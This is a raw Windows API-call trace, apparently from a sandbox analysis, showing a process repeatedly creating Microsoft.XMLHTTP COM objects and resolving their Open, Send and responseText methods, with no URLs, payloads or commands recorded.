	[0575.668] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0575.668] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0575.668] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0575.668] ??2@YAPEAX_K@Z () returned 0x62f310
	[0575.668] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0575.668] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0575.668] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0575.668] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0575.668] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0575.668] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0575.669] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0575.671] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0575.671] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0575.671] SysStringLen (param_1=0x0) returned 0x0
	[0575.671] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0575.672] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0575.672] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0575.672] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0575.672] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0575.672] ??2@YAPEAX_K@Z () returned 0x62f330
	[0575.672] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0575.672] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0575.672] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0575.672] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0575.672] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0575.672] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0575.672] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0575.672] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0575.672] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0575.673] SysStringLen (param_1=0x0) returned 0x0
	[0575.673] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0575.673] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0575.673] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0575.673] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0575.673] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0575.673] ??2@YAPEAX_K@Z () returned 0x62f310
	[0575.673] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0575.673] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0575.673] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0575.673] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0575.673] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0575.673] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0575.673] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0575.673] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0575.674] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0575.674] SysStringLen (param_1=0x0) returned 0x0
	[0575.674] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0575.674] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0575.674] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7520) returned 0x0
	[0575.674] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0575.674] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0575.674] ??2@YAPEAX_K@Z () returned 0x62f330
	[0575.674] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0575.674] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0575.674] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0575.674] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7520) returned 0x0
	[0575.674] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7520) returned 0x3
	[0575.674] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0575.674] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7520, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0575.674] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0575.675] longjmp () 
	[0575.675] longjmp () 
	[0575.675] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0575.675] SysStringLen (param_1=0x0) returned 0x0
	[0575.675] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0575.675] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0575.675] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0575.675] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0575.675] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0575.675] ??2@YAPEAX_K@Z () returned 0x62f310
	[0575.675] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0575.675] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0575.675] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0575.675] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0575.675] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0575.675] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0575.676] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0575.676] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0575.676] longjmp () 
	[0575.676] longjmp () 
	[0575.676] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0575.676] SysStringLen (param_1=0x0) returned 0x0
	[0575.676] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0575.676] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0575.676] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0575.676] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0575.676] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0575.676] ??2@YAPEAX_K@Z () returned 0x62f330
	[0575.676] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0575.676] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0575.676] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0575.677] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0575.677] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0575.677] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0575.677] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0575.677] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0575.677] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0575.677] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0575.677] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0576.581] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0576.581] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0576.581] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
